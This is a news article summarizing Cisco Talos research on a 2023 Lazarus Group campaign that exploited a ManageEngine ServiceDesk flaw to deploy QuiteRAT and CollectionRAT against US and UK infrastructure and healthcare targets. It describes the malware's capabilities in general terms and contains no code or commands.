After uncovering a campaign by the North Korean state-sponsored Lazarus Group that targeted internet infrastructure and healthcare organizations in the U.S. and UK, researchers discovered new details about two different malware families in use by the prominent threat group.
The campaign by Lazarus Group in early 2023 exploited a ManageEngine ServiceDesk flaw (CVE-2022-47966) just four days after related PoCs were publicly disclosed. After gaining initial access, researchers observed the threat group execute a malicious binary and use the curl command to deploy QuiteRAT. This remote access trojan was previously discovered in February, but further details about this malware have not been divulged before this campaign.
Researchers said that QuiteRAT has many similar capabilities to MagicRAT, one of the other malware families used by the group (such as arbitrary command execution), though it is smaller and lacks the built-in persistence capabilities that MagicRAT has. Both RATs were also built on the QT framework, a programming library for developing graphical user interfaces. Because QuiteRAT and MagicRAT have no graphical user interfaces, researchers believe the intent here by the developers is to increase the complexity of the malware code.
“Lazarus Group’s increasing use of the Qt framework creates challenges for defenders,” said Jung soo An, Asheer Malhotra and Vitor Ventura, researchers with Cisco Talos in a Thursday analysis. “It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.”
QuiteRAT is quite simple and has many standard RAT capabilities. In an attack against an internet backend infrastructure provider in the UK, for instance, researchers observed that post-execution, QuiteRAT was used to perform reconnaissance and send preliminary system data to the C2 servers, run arbitrary commands and deploy additional malware.
Due to their similarities, researchers believe that QuiteRAT is an evolution of MagicRAT. For example, both implants use base64 encoding for obfuscation in addition to an extra measure (like XOR) that makes it hard to decode their strings; and they both have a feature that allows them to sleep for a specific period of time, likely used by attackers to keep the implant dormant while ensuring continued access to the compromised network.
“Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase.”
In its campaign, the threat actors reused infrastructure that has been documented by the security community over the years, allowing researchers to track these recycled components and identify the newest malware in Lazarus Group’s arsenal, called CollectionRAT. This RAT also has several standard capabilities, including the capability to run arbitrary commands on compromised systems, as well as gathering system information and downloading additional payloads.
“The implant consists of a packed Microsoft Foundation Class (MFC) library-based windows binary that decrypts and executes the actual malware code on the fly,” said researchers. “Although MFC is a complex object-oriented wrapper around the win32 and COM APIs, used to create a variety of Windows applications that heavily use user interfaces, controls and events, it is quite popular with malware developers.”
Researchers noted that some of the malware samples that were discovered from 2021 are signed with the same code signing certificate used by EarlyRAT, which is another malware that has been attributed to Lazarus subgroup Andariel.
On this same infrastructure being reused by Lazarus Group, researchers found several components giving an inside look at what other tools the threat actors are relying on. For instance, they found a malicious copy of the PuTTY Plink reverse tunneling tool, which was being used to serve CollectionRAT to compromised endpoints.
Researchers also identified a beacon from the open-source DeimosC2 framework, which they believe is being deployed during initial access against compromised Linux endpoints. DeimosC2 is a known framework with implants that have various capabilities, including executing commands, stealing credentials and dumping registries, downloading files and executing shellcode.
Overall, the use of CollectionRAT and DeimosC2 highlight how the threat group continues to evolve its techniques while also consistently launching attacks over the past year, such as targeting out-of-date Microsoft IIS servers in June.
“Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase,” said researchers.